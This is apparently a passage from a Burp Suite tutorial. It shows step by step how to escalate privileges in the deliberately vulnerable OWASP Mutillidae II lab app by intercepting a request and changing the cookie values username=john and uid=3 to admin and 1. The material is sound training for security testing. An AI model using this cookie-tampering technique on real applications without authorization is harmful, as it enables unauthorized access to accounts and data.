Ensure Burp and OWASP BWA VM are running and that Burp is configured in the Firefox browser used to view the OWASP BWA applications.

1. From the OWASP BWA Landing page, click the link to the OWASP Mutillidae II application.
2. Open the Firefox browser to the login screen of OWASP Mutillidae II. From the top menu, click Login.
3. At the login screen, log in with these credentials—username: john and password: monkey.

4. Switch to Burp's Proxy | HTTP history tab. Find the POST and subsequent GET requests you just made by logging in as john:

5. Look at the GET request from the listing; notice the cookie name/value pairs shown on the Cookie: line.

The name/value pairs of most interest include username=john and uid=3. What if we attempt to manipulate these values to a different role?

6. Let's attempt to manipulate the parameters username and the uid stored in the cookie to a different role. We will use Burp's Proxy | Intercept to help us perform this attack.
7. Switch to the Proxy | Intercept tab, and press the Intercept is on button. Return to the Firefox browser and reload the login page.

8. The request is paused within the Proxy | Intercept tab. While it is paused, change the value assigned to the username from john to admin. Also, change the value assigned to the uid from 3 to 1:

9. Click the Forward button, and press the Intercept is on again to toggle the intercept button to OFF (Intercept is off).
10. Return to the Firefox browser, and notice we are now logged in as an admin! We were able to escalate our privileges from a regular user to an admin, since the developer did not perform any authorization checks on the assigned role: